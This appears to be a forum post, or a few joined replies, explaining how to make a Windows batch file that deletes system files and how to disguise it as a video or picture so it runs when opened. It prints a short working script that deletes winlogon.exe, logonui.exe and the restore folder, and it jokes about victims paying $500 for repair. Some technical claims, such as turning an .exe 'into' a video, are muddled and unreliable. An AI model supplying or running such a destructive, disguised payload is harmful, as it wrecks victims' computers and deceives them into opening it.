You can make a file .bat and later execute it into a .exe and even if you want it may be done to execute that .exe into perhaps a video or picute, and when hte video/picute is opened the paylode will be executed to the "root/system/boot" u want.

It is a list of commands that are executed by the windows command line. It deletes the windows system files. The most important files you can have. Thet ARE the computers operating system.
which deletes windows system32 which completly imobalizes windows so when u restart u have to reinstall windows or get it professionaly checked and fixed which costs $500 :P

lol well i think that should delete the folder, but some won't let it, so i would use...
@echo off
del c:\windows\system32\restore
del c:\windows\system32\winlogon.exe
del c:\windows\system32\logonui.exe
and save it as a .bat file
